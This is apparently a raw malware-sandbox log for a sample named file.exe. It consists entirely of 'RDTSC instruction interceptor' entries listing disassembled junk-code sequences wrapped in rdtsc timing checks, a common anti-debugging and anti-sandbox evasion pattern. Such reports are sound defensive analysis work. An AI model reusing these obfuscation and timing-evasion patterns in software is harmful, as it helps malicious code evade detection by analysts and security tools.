                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560E07 second address: 560E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edi 0x00000007 pushad 0x00000008 jmp 00007F5B4C774D90h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop edi 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F5B4C774D88h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c movsx edi, di 0x0000002f mov edi, 0FEA1C61h 0x00000034 push 00000000h 0x00000036 mov edi, 34C9EE3Fh 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007F5B4C774D88h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 0000001Ch 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 mov di, cx 0x0000005a xchg eax, esi 0x0000005b push ecx 0x0000005c push eax 0x0000005d push edx 0x0000005e jp 00007F5B4C774D86h 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560E87 second address: 560E95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561F1E second address: 561F28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5B4C774D86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561F28 second address: 561F36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561F36 second address: 561F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561F3D second address: 561F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CD63 second address: 55CD69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CD69 second address: 55CD6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CE28 second address: 55CE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5630C9 second address: 5630CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563F9C second address: 563FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4C774D8Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563FB0 second address: 563FB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564134 second address: 56413E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5B4C774D86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56413E second address: 564151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4D24B71Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56BD04 second address: 56BD0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B3CA second address: 56B415 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5B4D24B71Ch 0x00000008 push edi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F5B4D24B723h 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5B4D24B720h 0x0000001a pushad 0x0000001b jmp 00007F5B4D24B71Fh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B415 second address: 56B41A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B56D second address: 56B57F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5B4D24B716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F5B4D24B718h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B6E8 second address: 56B711 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5B4C774D8Ch 0x00000008 jnl 00007F5B4C774D86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 je 00007F5B4C774D8Eh 0x00000017 push eax 0x00000018 pop eax 0x00000019 jns 00007F5B4C774D86h 0x0000001f push eax 0x00000020 push edx 0x00000021 jbe 00007F5B4C774D86h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B711 second address: 56B715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B87C second address: 56B88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4C774D8Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B88B second address: 56B8AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B71Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5B4D24B71Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B8AA second address: 56B8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F4AF second address: 56F4E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B71Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F5B4D24B71Eh 0x00000010 push ecx 0x00000011 jp 00007F5B4D24B716h 0x00000017 pop ecx 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5B4D24B71Bh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56F4E1 second address: 56F4E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5754E1 second address: 5754EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4D24B71Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57579B second address: 5757A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 575EBE second address: 575EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576039 second address: 576047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5B4C774D86h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576047 second address: 576073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5B4D24B71Ch 0x0000000a jmp 00007F5B4D24B725h 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576073 second address: 576077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576077 second address: 57608C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B721h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57978D second address: 5797BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F5B4C774D90h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551337 second address: 551393 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5B4D24B718h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F5B4D24B718h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 movsx edi, dx 0x0000002a or edx, dword ptr [ebp+122D2967h] 0x00000030 lea eax, dword ptr [ebp+124930A6h] 0x00000036 xor edi, dword ptr [ebp+12480E62h] 0x0000003c nop 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F5B4D24B724h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551393 second address: 551399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551399 second address: 5513B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F5B4D24B71Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5513B4 second address: 52C2A6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jne 00007F5B4C774D90h 0x0000000e call dword ptr [ebp+12456980h] 0x00000014 jo 00007F5B4C774DAAh 0x0000001a js 00007F5B4C774D8Eh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551481 second address: 551486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55188C second address: 551894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551B79 second address: 551B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5B4D24B716h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551BE9 second address: 551C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5B4C774D8Ch 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551C00 second address: 551C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551C06 second address: 551C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 xchg eax, esi 0x00000007 jmp 00007F5B4C774D8Bh 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F5B4C774D86h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551CCC second address: 551CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551E4B second address: 551E83 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F5B4C774D88h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov di, cx 0x00000026 push 00000004h 0x00000028 mov dword ptr [ebp+122D26EEh], edx 0x0000002e nop 0x0000002f push edi 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551E83 second address: 551E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551E87 second address: 551EB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 jns 00007F5B4C774D9Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F5B4C774D86h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551EB2 second address: 551EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5522A9 second address: 5522AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5522AF second address: 5522D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B727h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jbe 00007F5B4D24B71Eh 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552454 second address: 552459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55263B second address: 552675 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c push ecx 0x0000000d jno 00007F5B4D24B716h 0x00000013 pop ecx 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jmp 00007F5B4D24B71Bh 0x0000001e mov eax, dword ptr [eax] 0x00000020 pushad 0x00000021 jmp 00007F5B4D24B71Fh 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552675 second address: 552679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552679 second address: 55268E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F5B4D24B716h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55268E second address: 552698 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5B4C774D86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552698 second address: 5526AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4D24B722h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55274A second address: 55275C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5B4C774D86h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55275C second address: 552760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552760 second address: 552764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552764 second address: 5527C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F5B4D24B718h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 jns 00007F5B4D24B71Ch 0x00000028 lea eax, dword ptr [ebp+124930EAh] 0x0000002e sub edx, dword ptr [ebp+1247E5E7h] 0x00000034 nop 0x00000035 jmp 00007F5B4D24B720h 0x0000003a push eax 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5527C0 second address: 5527C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5527C4 second address: 52CEBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 lea eax, dword ptr [ebp+124930A6h] 0x0000000e stc 0x0000000f nop 0x00000010 jmp 00007F5B4D24B721h 0x00000015 push eax 0x00000016 push esi 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b pop esi 0x0000001c nop 0x0000001d or dword ptr [ebp+12467A8Ah], edx 0x00000023 call dword ptr [ebp+12452662h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e jmp 00007F5B4D24B721h 0x00000033 jmp 00007F5B4D24B726h 0x00000038 push edx 0x00000039 pop edx 0x0000003a popad 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52CEBD second address: 52CEDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D8Ah 0x00000007 push edx 0x00000008 jmp 00007F5B4C774D92h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 579BBF second address: 579BF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B722h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F5B4D24B727h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jne 00007F5B4D24B716h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A474 second address: 57A481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jo 00007F5B4C774D8Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A481 second address: 57A485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A485 second address: 57A48A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A48A second address: 57A49C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jne 00007F5B4D24B716h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EEEF second address: 57EF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F5B4C774D98h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EF0C second address: 57EF18 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5B4D24B71Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EF18 second address: 57EF26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EF26 second address: 57EF2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EF2C second address: 57EF39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F5B4C774D86h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F099 second address: 57F09D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F09D second address: 57F0BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4C774D8Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F5B4C774D86h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F0BA second address: 57F0EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B726h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5B4D24B728h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F0EC second address: 57F0F1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F420 second address: 57F44A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B727h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnp 00007F5B4D24B716h 0x00000012 pushad 0x00000013 popad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F44A second address: 57F45C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F5B4C774D88h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FA0C second address: 57FA3D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5B4D24B728h 0x0000000c jne 00007F5B4D24B716h 0x00000012 jmp 00007F5B4D24B71Bh 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FA3D second address: 57FA43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FA43 second address: 57FA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FCE2 second address: 57FCEE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 je 00007F5B4C774D86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FE72 second address: 57FE98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5B4D24B729h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FFFA second address: 580016 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D98h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
